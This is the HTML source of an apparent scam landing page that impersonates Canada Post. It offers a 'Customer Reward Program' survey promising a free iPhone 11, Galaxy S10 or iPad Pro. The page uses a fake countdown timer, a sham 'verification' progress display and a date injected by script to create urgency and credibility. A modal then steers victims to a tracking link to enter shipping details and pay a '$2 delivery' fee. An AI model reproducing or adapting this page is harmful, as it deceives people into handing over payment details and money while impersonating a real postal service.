<html lang="en" class="gr__whatsinthe_press"><head>
  <base href="">

 
  
<script id="im-pre-plugins">

var values = ["Verifying answers...", "Verifying IP-address...", "Selecting Gift...", "Congratulations!"];
</script>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="robots" content="noindex, nofollow">
    <meta name="googlebot" content="noindex">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=no, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="stylesheet" href="bootstrap.min.css">
    <title id="title">Canada Post Customer Reward Program </title>
    <style>

.active {
  background-color: #005ab3 !important; }

.marked {
  font-weight: bold;
  color: #005ab3; }

body {
  font: 100% Helvetica, sans-serif;
  color: #fff;
  background: #e6e6e6; }

header .logo-wrap {
  background-color: #ffffff; }
  header .logo-wrap table {
    width: 100%; }
  header .logo-wrap .logo {
    padding: 15px 5px 5px 0px; }
  header .logo-wrap .logo-note {
    z-index: 99; }
  header .logo-wrap .logo-note__header {
    font-weight: bold;
    font-size: 22px;
    color: #fff;
    text-align: center; }
  header .logo-wrap .logo-note__body {
    font-size: 14px;
    color: #fff;
    text-align: center; }
  header .logo-wrap .lang {
    font: 120% Helvetica, sans-serif;
    text-align: right;
    color: #000;
    vertical-align: middle; }
  header .logo-wrap .icon-right {
    text-align: right;
    vertical-align: middle; }

header .slogan-wrap {
  background-color: #005ab3; }
  header .slogan-wrap .slogan {
    font: 190% Helvetica, sans-serif;
    color: #ffffff;
    padding: 10px 15px 10px 15px; }

.body-container {
  background-color: transparent;
  margin-bottom: 10px; }

.lead-container {
  background-color: transparent; }
  @media screen and (min-width: 768px) {
    .lead-container {
      background-position: left bottom; } }
  .lead-container .recipe-brother {
    min-height: 140px; }
  .lead-container .recipe-content {
    background-color: #ffffff !important;
    color: #000;
    font: 140% Helvetica, sans-serif;
    font-weight: 300;
    padding-top: 10px;
    padding-bottom: 10px;
    margin-top: 20px;
    overflow: hidden;
    border-radius: 5px; }
    .lead-container .recipe-content .timer {
      margin-top: 10px;
      padding-top: 10px;
      border-top: 1px solid #005ab3; }
    .lead-container .recipe-content .icon-round {
      display: inline-block;
      width: 40px;
      height: 40px; }
    .lead-container .recipe-content .recipe-header {
      display: inline-block;
      padding-left: 10px; }
      @media screen and (max-width: 460px) {
        .lead-container .recipe-content .recipe-header {
          padding-left: 20px; } }
      @media screen and (min-width: 600px) {
        .lead-container .recipe-content .recipe-header {
          padding-left: 5px; } }
      @media screen and (min-width: 640px) {
        .lead-container .recipe-content .recipe-header {
          padding-left: 0px; } }
      @media screen and (min-width: 1200px) {
        .lead-container .recipe-content .recipe-header {
          margin-left: -5px; } }
      .lead-container .recipe-content .recipe-header .phrase {
        font: 120% Helvetica, sans-serif;
        color: #005ab3; }
      .lead-container .recipe-content .recipe-header .date {
        font: 90% Helvetica, sans-serif;
        color: #005ab3; }

.clickable {
  cursor: pointer; }

.copyright {
  margin-top: 5px;
  background-color: #ffffff;
  font: 130% Helvetica, sans-serif;
  color: #000; }

.copyright-image {
  margin-top: 10px;
  margin-bottom: 10px; }

.conditions {
  padding-bottom: 10px; }
  .conditions a {
    font: 90% Helvetica, sans-serif;
    text-decoration: underline;
    color: #2e2e2e; }

.jingle-header-crutch {
  margin-bottom: 10px; }
  .jingle-header-crutch .slogan {
    padding-left: 10px;
    font: 140% Helvetica, sans-serif;
    font-weight: bold;
    vertical-align: middle; }
    @media screen and (max-width: 370px) {
      .jingle-header-crutch .slogan {
        font: 130% Helvetica, sans-serif; } }

/*
    $quiz-background-color:
    $quiz-header-text-color:
    $quiz-qu-background-color:
    $quiz-qu-text-color:
    $quiz-progress-text-color:
    $quiz-progress-percent-text-color:
    $quiz-progress-wrap-color:
    $quiz-progress-bar-color:
    $quiz-mark-background-color:
    $quiz-mark-border-color:
    $quiz-checkpoint-text-color:
    $quiz-prize-name-color:
    $quiz-prize-desc-color:
    $quiz-btn-dis-background:
    $quiz-btn-dis-text-color:
    $quiz-take-it-background:
    $quiz-take-it-text-color:
*/
#qu-progress {
  padding: 30px 20px 10px 20px; }
  #qu-progress .qu-check-prize-note {
    font-weight: bold;
    font-size: 20px;
    padding-top: 40px; }
  #qu-progress .qu-progress-animation {
    text-align: center; }
  #qu-progress #qu-progress-state {
    padding: 0;
    font: 180% Helvetica, sans-serif;
    color: #000000; }
  #qu-progress #qu-progress-percent {
    padding: 0;
    font: 180% Helvetica, sans-serif;
    color: #005ab3; }
  #qu-progress .qu-progress-wrap {
    padding: 0;
    margin-top: 10px;
    margin-bottom: 20px;
    background-color: #000; }
    #qu-progress .qu-progress-wrap #qu-progress-bar {
      height: 15px;
      width: 0%;
      background-color: #005ab3; }
  #qu-progress .qu-checkpoint {
    padding: 0;
    font: 160% Helvetica, sans-serif;
    margin-bottom: 10px;
    opacity: 0.0; }
    #qu-progress .qu-checkpoint .qu-mark {
      background-color: #005ab3;
      margin-right: 10px;
      margin-left: 5px;
      display: inline-block;
      width: 12px;
      height: 12px;
      border-radius: 50%;
      border: 4px solid #000000; }
    #qu-progress .qu-checkpoint .qu-checkpoint-desc {
      color: #000000; }

#progressbar {
  display: none; }

#loading-animation {
  display: none; }

#lead-text {
  margin-bottom: 20px; }

#claim-text {
  color: white; }

.qu-wrap {
  background-color: #ffffff;
  min-height: 290px;
  border-radius: 5px;
  margin-top: 20px; }
  .qu-wrap .qu-group-header {
    font: 200% Helvetica, sans-serif;
    color: #005ab3;
    padding: 10px 0px 15px 0px;
    text-align: center; }
  .qu-wrap .qu-group {
    padding: 10px 20px 10px 20px; }
    .qu-wrap .qu-group .qu {
      border-radius: 5px;
      cursor: pointer;
      font: 200% Helvetica, sans-serif;
      color: #fff;
      background-color: #005ab3;
      padding: 10px;
      margin-bottom: 10px;
      text-align: center; }
      .qu-wrap .qu-group .qu:active {
        background-color: #005ab3; }
  .qu-wrap #qu-prize {
    padding: 0px 20px 10px 20px; }
    .qu-wrap #qu-prize .qu-prize-row {
      margin-top: 5px;
      margin-bottom: 20px;
      background-color: #ffffff;
      padding: 10px 10px 10px 10px;
      border-radius: 5px; }
    .qu-wrap #qu-prize .qu-prize-row.qu-opacied {
      opacity: 0.5; }
    .qu-wrap #qu-prize .qu-prize-name {
      display: block;
      font: 120% Helvetica, sans-serif;
      color: #005ab3;
      margin-bottom: 0px; }
    .qu-wrap #qu-prize .qu-prize-desc {
      font-size: 10px; }
    .qu-wrap #qu-prize .qu-item {
      padding-left: 0px;
      padding-right: 0px; }
      @media screen and (min-width: 768px) {
        .qu-wrap #qu-prize .qu-item {
          text-align: right;
          padding-right: 10px; } }
    .qu-wrap #qu-prize .qu-prize-description {
      padding-left: 5px;
      padding-right: 0px;
      padding-top: 0px;
      font: 120% Helvetica, sans-serif;
      color: #000; }
    .qu-wrap #qu-prize .qu-btn-dis {
      border-radius: 5px;
      -webkit-box-shadow: 1px 1px 1px 0px #b3b3b3;
      -moz-box-shadow: 1px 1px 1px 0px #b3b3b3;
      box-shadow: 1px 1px 1px 0px #b3b3b3;
      cursor: pointer;
      font-weight: bold !important;
      text-align: center;
      font: 100% Helvetica, sans-serif;
      color: #fff;
      margin-top: 12px;
      padding: 10px;
      background-color: #000;
      max-width: 95%; }
      .qu-wrap #qu-prize .qu-btn-dis:active {
        background-color: #bfbfbf; }
    .qu-wrap #qu-prize .qu-take-it {
      border-radius: 5px;
      cursor: pointer;
      display: block;
      font-weight: bold !important;
      text-align: center;
      font: 100% Helvetica, sans-serif;
      color: #fff;
      background-color: #005ab3;
      margin-top: 12px;
      padding: 10px;
      max-width: 95%; }
      .qu-wrap #qu-prize .qu-take-it:active {
        background-color: #005ab3; }
      .qu-wrap #qu-prize .qu-take-it:hover {
        text-decoration: none; }
    @media screen and (max-width: 360px) {
      .qu-wrap #qu-prize .prize-image {
        width: 95%; } }

/*
    $comment-container-background:
    $comment-text-color:
    $comment-face-border-color:
    $comment-textarea-text-color:
    $comment-post-background:
    $comment-post-text-color:
    $comment-name-color:
    $comment-date-color:
    $comment-img-border-color:
*/
.comment-container {
  font: 120% Helvetica, sans-serif;
  background-color: #ffffff;
  color: #000;
  padding: 20px 15px 10px;
  margin-top: 20px;
  border-radius: 5px; }
  .comment-container .comment-header {
    font: 140% Helvetica, sans-serif;
    margin-bottom: 20px; }
  .comment-container .comment-wrap {
    margin-bottom: 40px; }
  .comment-container .face-round {
    width: 50px;
    height: 50px;
    border-radius: 50%;
    border: 2px solid #000; }
  .comment-container textarea {
    text-align: left;
    width: 90%;
    height: 100px;
    color: #141414; }
  .comment-container #comment-post {
    border-radius: 5px;
    cursor: pointer;
    margin-top: 30px;
    color: #fff;
    font-weight: bold;
    padding: 5px 10px 5px 10px;
    background-color: #005ab3;
    display: inline-block; }
    .comment-container #comment-post:active {
      background-color: #005ab3; }
  .comment-container .comment-desc .name {
    display: inline-block;
    color: #005ab3;
    font-weight: bold;
    padding-bottom: 5px; }
  .comment-container .comment-desc .date {
    display: inline-block;
    padding-top: 5px;
    font: 90% Helvetica, sans-serif;
    color: #474747; }
  .comment-container .comment-desc .comment-img {
    border: 1px solid #141414;
    margin-top: 10px;
    margin-bottom: 0px;
    padding: 5px;
    width: 200px;
    display: block; }

/*
  $tingle-btn-background: grey;
  $tingle-btn-color: #fff;
  $tingle-modal-background: #fff;
  $tingle-footer-background: #f5f5f5;

*/
/* ----------------------------------------------------------- */
/* == tingle v0.9.0 */
/* ----------------------------------------------------------- */
.tingle-modal * {
  box-sizing: border-box; }

.tingle-modal {
  font: 140% Helvetica, sans-serif;
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1000;
  display: flex;
  visibility: hidden;
  flex-direction: column;
  align-items: center;
  overflow-y: auto;
  background: rgba(0, 0, 0, 0.8);
  opacity: 0;
  cursor: pointer;
  transition: transform .2s ease; }

/* confirm and alerts
-------------------------------------------------------------- */
.tingle-modal--confirm .tingle-modal-box {
  text-align: center; }

.tingle-modal-box {
  position: relative;
  flex-shrink: 0;
  margin-top: auto;
  margin-bottom: auto;
  border-radius: 4px;
  background: #141414;
  opacity: 1;
  cursor: auto;
  transition: transform 0.3s cubic-bezier(0.175, 0.885, 0.32, 1.275);
  transform: scale(0.8); }

.tingle-modal-box__content {
  padding: 3rem 3rem; }

.tingle-modal-box__footer {
  padding: 1.5rem 2rem;
  width: auto;
  border-bottom-right-radius: 4px;
  border-bottom-left-radius: 4px;
  background-color: #474747;
  cursor: auto; }

.tingle-modal-box__footer::after {
  display: table;
  clear: both;
  content: ""; }

.tingle-modal-box__footer--sticky {
  position: fixed;
  bottom: -200px;
  /* TODO : find a better way */
  z-index: 10001;
  opacity: 1;
  transition: bottom .3s ease-in-out .3s; }

/* state
-------------------------------------------------------------- */
.tingle-enabled {
  overflow: hidden;
  height: 100%; }

.tingle-modal--visible .tingle-modal-box__footer {
  bottom: 0; }

.tingle-enabled .tingle-content-wrapper {
  filter: blur(15px); }

.tingle-modal--visible {
  visibility: visible;
  opacity: 1; }

.tingle-modal--visible .tingle-modal-box {
  transform: scale(1); }

.tingle-modal--overflow {
  padding-top: 8vh; }

/* btn
-------------------------------------------------------------- */
.tingle-btn {
  font: 140% Helvetica, sans-serif;
  display: inline-block;
  margin: 0 .5rem;
  padding: 1rem 2rem;
  border: none;
  background-color: #005ab3;
  box-shadow: none;
  color: #000000;
  vertical-align: middle;
  text-decoration: none;
  line-height: normal;
  cursor: pointer;
  transition: background-color .4s ease; }

.tingle-btn--primary {
  background-color: #3498db; }

.tingle-btn--danger {
  background-color: #e74c3c; }

.tingle-btn--default {
  background-color: #34495e; }

.tingle-btn--pull-left {
  float: left; }

.tingle-btn--pull-right {
  float: right; }

/* responsive
-------------------------------------------------------------- */
@media (max-width: 540px) {
  .tingle-modal-box {
    top: 20%;
    width: auto;
    border-radius: 0; }
  .tingle-modal {
    display: block;
    width: 100%; }
  .tingle-modal--overflow {
    padding: 0; }
  .tingle-modal-box__footer .tingle-btn {
    display: block;
    float: none;
    margin-bottom: 1rem;
    width: 100%; }
  /* .tingle-modal__close {
    top: 0;
    right: 0;
    left: 0;
    display: block;
    width: 100%;
    height: 60px;
    border: none;
    background-color: #2c3e50;
    box-shadow: none;
    color: #fff;
    line-height: 55px;
  }

  .tingle-modal__closeLabel {
    display: inline-block;
    vertical-align: middle;
    font-size: 1.5rem;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
  }

  .tingle-modal__closeIcon {
    display: inline-block;
    margin-right: .5rem;
    vertical-align: middle;
    font-size: 4rem;
  } */ }

.modal-body p {
  margin: 0;
  color: #000;
  font-size: 15px;
  line-height: 22px;
}
.modal-body .logo-main {
    float: right;
    width: 113px;
    padding-right: 14px;
}
.modal-footer {
    position: relative;
}
.modal-line {
    position: absolute;
    left: 15px;
    top: 0;
    max-width: 170px;
}
    
/****** PART 2 ******/
header .slogan-wrap{
    background-color: #004890
}
.lead-container .recipe-content .recipe-header .phrase{
    color: #004890
}
.marked{
    color: #004890
}
.qu-wrap .qu-group-header{
    color: #004890
}
.comment-container .comment-desc .name{
    color: #004890
}
.qu-wrap .qu-group .qu{
    border: solid 2px #004890;
    background-color: #004890;
    color: #fff;
    padding: 14px 20px 13px;
    border-radius: 5px;
}
.comment-container #comment-post{
    border: solid 2px #004890;
    background-color: #004890;
    color: #fff;
    border-radius: 5px;
}
.icon-round{
    background: url(icon.png) no-repeat
}
.lead-container .recipe-content .timer {
    margin-top: 10px;
    padding-top: 10px;
    border-top: 1px solid #004890;
}
.btn-primary1 {
    color: #fff;
    background-color: #004890;
    border-color: #004890;
    border-radius: 5px;
}
#qu-progress .qu-progress-wrap #qu-progress-bar {
    background-color: #004890;
}
#qu-progress #qu-progress-percent{
    color: #004890
}
.qu-wrap #qu-prize .qu-prize-name{
    color: #004890
}
.qu-wrap #qu-prize .qu-take-it{
    border: solid 2px #004890;
    background-color: #004890;
    color: #fff;
    padding: 14px 20px 13px;
    border-radius: 5px;
}
.qu-wrap #qu-prize .qu-take-it:active{
    background-color: #fff;
    color: #004890;
    border-color: #004890
}
#qu-progress .qu-checkpoint .qu-mark{
    background-color: #004890;
}
.tingle-btn{
    border: solid 2px #004890;
    background-color: #004890;
    color: #fff;
    padding: 14px 20px 13px;
    border-radius: 5px;
}


.tp {
    color: green;
    font-size: 14px;
}
.blink {
  animation: blinker 1s linear infinite;
}

@keyframes blinker {
  50% {
    opacity: 0;
  }
}

    .icon-round {
    background: url(4203f9aac0cc39b7217ae93d7ae0c02b.png) no-repeat;
}
        @keyframes fadeIn {
            from {
                opacity: 0
            }
            to {
                opacity: 1
            }
        }
        
        -webkit-@keyframes fadeIn {
            from {
                opacity: 0
            }
            to {
                opacity: 1
            }
        }
        
        -o-@keyframes fadeIn {
            from {
                opacity: 0
            }
            to {
                opacity: 1
            }
        }
        
        -moz-@keyframes fadeIn {
            from {
                opacity: 0
            }
            to {
                opacity: 1
            }
        }
        
        .fadeIn {
            animation: fadeIn .5s;
            -webkit-animation: fadeIn .5s;
            -moz-animation: fadeIn .5s;
            -o-animation: fadeIn .5s;
        }
        
        @keyframes fadeOut {
            from {
                opacity: 1
            }
            to {
                opacity: 0
            }
        }
        
        -webkit-@keyframes fadeOut {
            from {
                opacity: 1
            }
            to {
                opacity: 0
            }
        }
        
        -moz-@keyframes fadeOut {
            from {
                opacity: 1
            }
            to {
                opacity: 0
            }
        }
        
        -o-@keyframes fadeOut {
            from {
                opacity: 1
            }
            to {
                opacity: 0
            }
        }
        
        .fadeOut {
            animation: fadeOut .5s;
            -wekit-animation: fadeOut .5s;
            -moz-animation: fadeOut .5s;
            -o-animation: fadeOut .5s;
        }
        
        @keyframes draw {
            from {
                width: 0%
            }
            to {
                width: 100%;
            }
        }
        
        .draw {
            animation: draw 2.5s linear;
            -webkit-animation: draw 2.5s linear;
            -moz-animation: draw 2.5s linear;
            -o-animation: draw 2.5s linear;
        }
        
        @keyframes slideIn {
            from {
                margin-top: -100px;
            }
            to {
                margin-top: 30px;
            }
        }
        
        .slideIn {
            animation: slideIn .7s;
            -webkit-animation: slideIn .7s;
            -moz-animation: slideIn .7s;
            -o-animation: slideIn .7s;
        }
        
        @keyframes slideFadeOut {
            from {
                margin-top: 30px;
                opacity: 1
            }
            to {
                margin-top: 5px;
                opacity: 0
            }
        }
        
        .slideFadeOut {
            animation: slideFadeOut .7s;
            -webkit-animation: slideFadeOut .7s;
            -moz-animation: slideFadeOut .7s;
            -o-animation: slideFadeOut .7s;
        }
        
        @keyframes scaleBox {
            0% {
                transform: scale(0.6);
            }
            100% {
                transform: scale(1)
            }
        }
        
        .tingle-modal--visible .tingle-modal-box.scaleBox {
            animation: scaleBox .3s ease;
            -webkit-animation: scaleBox .3s ease;
            -moz-animation: scaleBox .3s ease;
            -o-animation: scaleBox .3s ease;
        }

        /* SPRITES */
.bg-face01 {
    width: 50px; height: 50px;
    background: url('sprites.gif') -0 -0;
}

.bg-face03 {
    width: 50px; height: 50px;
    background: url('sprites.gif') -50px -0;
}

.bg-face02 {
    width: 50px; height: 50px;
    background: url('sprites.gif') -0 -50px;
}

.bg-face04 {
    width: 50px; height: 50px;
    background: url('sprites.gif') -50px -50px;
}

.bg-face05 {
    width: 50px; height: 50px;
    background: url('sprites.gif') -100px -0;
}

.bg-face06 {
    width: 50px; height: 50px;
    background: url('sprites.gif') -100px -50px;
}
/** SPRITES 2 **/
.bg-icon {
    width: 40px; height: 40px;
    background: url('sprites2.png') -10px -136px;
}
.bg-line {
    width: 208px; height: 6px;
    background: url('sprites2.png') -187px -10px;
}
.bg-rta {
    width: 88px; height: 31px;
    background: url('sprites2.png') -10px -85px;
}
.bg-logo {
    width: 157px; height: 55px;
    background: url('sprites2.png') -10px -10px;
}

    </style>
	<link rel="shortcut icon" type="image/png" href="4203f9aac0cc39b7217ae93d7ae0c02b.png">
<script>
	window.prize = getURLParameter('p');
	
	function getURLParameter(name) {
            var param = decodeURI(
                (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
            );
            return param.replace(/\+/gim," ");
        }
</script>
</head>

<body class="modal-open" style="" data-gr-c-s-loaded="true" id="dummybodyid">
    <div class="tingle-modal" id="tingle1" style="display: none;">
        <div class="tingle-modal-box">
            <div class="tingle-modal-box">
                <div class="tingle-modal-box__content">
                    <div class="jingle-header-crutch">
                        <table>
                            <tbody>
                                <tr>
                                    <td class="slogan"><span class="marked txt" id="txt1"> Exclusive for <span id="isp1">Canada Post</span> members</span>
                                    </td>
                                </tr>
                            </tbody>
                        </table>
                    </div>
                    <div class="txt" id="txt2"> Your <span class="marked">iPhone 11</span> has been reserved by<span id="isp2"> Canada Post</span>!</div><br><span class="txt" id="txt3">Terms and conditions: <br>1. On the next page fill in the shipping form with your contact details;<br>2. You only have to pay $2 for the delivery of your gift;<br>3. Your iPhone 11 will be shipped within two working days by Canada Post.</span></div>
                <div class="tingle-modal-box__footer"><a href="https://supertrackingz.com/click.php?lp=1" id="clickurl"><button class="tingle-btn tingle-btn--pull-right txt" onclick="__cta()" id="txt4">OK</button></a></div>
            </div>
        </div>
    </div>
    <div class="tingle-modal" style="display: none;">
        <div class="tingle-modal-box">
            <div class="tingle-modal-box__content"></div>
            <div class="tingle-modal-box__footer"><button></button></div>
        </div>
    </div>
    <div class="tingle-modal" style="display: none;">
        <div class="tingle-modal-box">
            <div class="tingle-modal-box__content"></div>
            <div class="tingle-modal-box__footer"><button></button></div>
        </div>
    </div>
    <div class="tingle-modal" style="display: none;">
        <div class="tingle-modal-box">
            <div class="tingle-modal-box__content"></div>
            <div class="tingle-modal-box__footer"><button></button></div>
        </div>
    </div>
    <div class="modal fade in" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="false" style="display: block; background-color: rgba(44, 44, 45, 0.701961);">
        <div class="modal-dialog slideIn">
            <div class="modal-content">
                <div class="modal-body">
                    <br>
                    <table>
                        <tbody>
                            <tr>


                                <td>
                                    <img src="8bcc25d60fa03743adbdbaae48ef9214.png" class="logo-main" id="logo1">
                                    
                                    <p style="font-size:10.5pt">
                                        <strong>
                                        <script type="text/javascript">document.write(new Date().toLocaleDateString(navigator.language || navigator.userLanguage, {year: 'numeric', month: 'long', day: 'numeric', weekday:'long'}))</script>October 3, 2019
                                        </strong>
                                    </p><br>

                                    <p class="txt" id="txt5"><b> Dear <span id="isp3">Canada Post</span> customer: </b></p><br>
                                    <p class="txt" id="txt6"> Congratulations! You are one of the 100 users we have selected as part of our loyalty program. You could win a free <b>iPhone 11</b>, <b>Samsung Galaxy S10</b> or <b>iPad Pro</b>.</p><br>
									<p class="txt" id="txt7">All you have to do to <b>qualify</b> is answering the following 8 questions.</p><p><br>
                                </p></td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <div class="modal-footer">
                    <img src="f210fe4f4408a90b0e23f95b28b13696.png" alt="" class="modal-line">
                    <button type="button" class="btn btn-primary1 txt" data-dismiss="modal" id="txt8">OK</button>
                </div>
            </div>
        </div>
    </div>

    <div class="tingle-modal" style="display: none;">
        <div class="tingle-modal-box">
            <div class="tingle-modal-box__content"></div>
            <div class="tingle-modal-box__footer"><button></button></div>
        </div>
    </div>

    <header>
        <div class="logo-wrap">
            <div class="container">
                <div class="row">
                    <div class="col-xs-12 col-md-8 col-md-offset-2 ">
                        <table style="width: 100%;">
                            <tbody>
                                <tr>
                                    <td class="logo">
                                        <img id="logo" class="clickable" src="8bcc25d60fa03743adbdbaae48ef9214.png" style="width: 120px">
                                    </td>
                                    
                                </tr>
                            </tbody>
                        </table>
                    </div>
                </div>
            </div>
        </div>
        <div class="slogan-wrap">
            <div class="container">
                <div class="row">
                    <div class="col-xs-12 col-md-8 col-md-offset-2 slogan text-xs-left txt" id="txt9">Canada Post Customer Reward Program</div>
                </div>
            </div>
        </div>
    </header>
    <div class="container body-container">
        <div class="row">
            <div class="lead-container col-xs-12 col-md-8 col-md-offset-2">
                <div id="recipe-row" class="row">
                    <div class="col-xs-12 recipe-content">
                        <div class="row">
                            <div class="col-xs-1">
                                <div class="icon-round"></div>
                            </div>
                            <div class="col-xs-10 col-md-11">
                                <div class="recipe-header">
                                    <div class="phrase txt" id="txt10"> Congratulations!</div>
                                    <div class="date_full">
                                        <script>
                                            document.write(new Date().toLocaleDateString(navigator.language || navigator.userLanguage, {
                                                year: 'numeric',
                                                month: 'long',
                                                day: 'numeric'
                                            }))
                                        </script>October 3, 2019
                                    </div>
                                </div>
                            </div>
                        </div>
                        <span class="txt" id="txt11"> Every day, we select a small group of Canada Post users to participate in our customer satisfaction survey and give them a chance to receive exclusive gifts from our partners and sponsors. This is our way of expressing our appreciation for you to choose Canada Post.
                        <br>
                        <br>By participating you will have the chance to win a free <span class="marked">iPhone 11</span>, <span class="marked">Samsung Galaxy S10</span> or <span class="marked">iPad Pro</span>. 
							This survey will allows us to better understand our customers and will take less then 30 seconds of your time.
							<br><br>
                        <span class="txt" id="txt12"><strong> Remember:</strong> 100 randomly selected customers have received this invitation and the number of gifts is limited.</span><br>
                        <div class="timer txt" id="txt13"> You have <span class="marked"><span id="timer-mins">2</span> minutes and <span id="timer-secs">19</span> seconds</span> to answer the following questions before we give this chance to the next lucky person among our customers!</div>
                    </span></div>
                </div>
            </div>
        </div>
        <div class="row">
            <div class="qu-wrap col-xs-12 col-md-8 col-md-offset-2 ">
                <div class="row">
                    <div class="qu-group col-xs-12">
                        <div class="row">
                            <div class="qu-group-header col-xs-12 txt" id="txt14"> Are you generally satisfied with the services offered by Canada Post?</div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt15"> Yes </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt16">No</div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt17"> Sometimes </div>
                        </div>
                    </div>
                    <div class="qu-group col-xs-12" style="display: none;">
                        <div class="row">
                            <div class="qu-group-header col-xs-12 txt" id="txt18"> Do you think the services of Canada Post are worse, equal or better than that of our competitors?</div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt19">Equal</div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt20">Better</div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt21"> Worse </div>
                        </div>
                    </div>
                    <div class="qu-group col-xs-12" style="display: none;">
                        <div class="row">
                            <div class="qu-group-header col-xs-12 txt" id="txt22"> Overall, do you think Canada Post shipping services are fast?</div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt23"> Yes, very fast! </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt24"> No, not really </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt25"> Sometimes </div>
                        </div>
                    </div>
                    <div class="qu-group col-xs-12" style="display: none;">
                        <div class="row">
                            <div class="qu-group-header col-xs-12 txt" id="txt26"> Are you satisfied with our shipping prices?</div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt27"> Yes </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt28"> No </div>
                        </div>
                    </div>

                    <div class="qu-group col-xs-12" style="display: none;">
                        <div class="row">
                            <div class="qu-group-header col-xs-12 txt" id="txt29">Was it easy to find all the information you needed on your last visit to the Canada Post website?</div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt30"> Yes </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt31"> No </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt32"> I don't remember </div>
                        </div>
                    </div>

                    <div class="qu-group col-xs-12" style="display: none;">
                        <div class="row">
                            <div class="qu-group-header col-xs-12 txt" id="txt33"> Would you recommend Canada Post to a friend?</div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt34"> Yes, certainly! </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt35">No</div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt36">I'm not sure</div>
                        </div>
                    </div>

                    <div class="qu-group col-xs-12" style="display: none;">
                        <div class="row">
                            <div class="qu-group-header col-xs-12">
                                How old are you?
                            </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2">
                                Under 18 years old
                            </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2">
                                18-25
                            </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2">
                                26-34
                            </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2">
                                35-54
                            </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2">
                                55-64
                            </div>
                        </div>
                    </div>

                    <div class="qu-group col-xs-12" style="display: none;">
                        <div class="row">
                            <div class="qu-group-header col-xs-12 txt" id="txt37"> What is your gender?</div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt38"> Male </div>
                        </div>
                        <div class="row">
                            <div class="qu col-xs-12 col-md-8 col-md-offset-2 txt" id="txt39"> Female </div>
                        </div>
                    </div>
                    <div id="qu-progress" class="col-xs-12" style="display: none;">
                        <div class="row">
                            <div class="qu-group-header col-xs-12">
                            </div>
                        </div>
                        <div class="row">
                            <div id="qu-progress-state" class="col-xs-6 col-md-4 col-md-offset-2 text-left">
                                <span class="txt" id="txt40"> Verification in progress... </span>
                            </div>
                            <div id="qu-progress-percent" class="col-xs-6 col-md-4 text-right">
                                0%
                            </div>
                        </div>
                        <div class="row">
                            <div class="col-xs-12 col-md-8 col-md-offset-2 qu-progress-wrap">
                                <div id="qu-progress-bar">
                                </div>
                            </div>
                        </div>
                        <div class="row">
                            <div id="qu-checkpoint-10" rel="Vérification des réponses" class="col-xs-10 col-md-offset-2 qu-checkpoint">
                                <table>
                                    <tbody>
                                        <tr>
                                            <td>
                                                <div id="qu-mark-10" class="qu-mark"></div>
                                            </td>
                                            <td>
                                                <span class="qu-checkpoint-desc txt" id="txt41"> You have answered (8/8) questions</span>
                                            </td>
                                        </tr>
                                    </tbody>
                                </table>
                            </div>
                        </div>
                        <div class="row">
                            <div id="qu-checkpoint-20" rel="Vérifier l'adresse IP" class="col-xs-10 col-md-offset-2 qu-checkpoint">
                                <table>
                                    <tbody>
                                        <tr>
                                            <td>
                                                <div id="qu-mark-20" class="qu-mark"></div>
                                            </td>
                                            <td>
                                                <span class="qu-checkpoint-desc txt" id="txt42">No repeated requests from your IP address where found </span>
                                            </td>
                                        </tr>
                                    </tbody>
                                </table>
                            </div>
                        </div>
                        <div class="row">
                            <div id="qu-checkpoint-30" rel="Sélection de cadeaux" class="col-xs-10 col-md-offset-2 qu-checkpoint">
                                <table>
                                    <tbody>
                                        <tr>
                                            <td>
                                                <div id="qu-mark-30" class="qu-mark"></div>
                                            </td>
                                            <td>
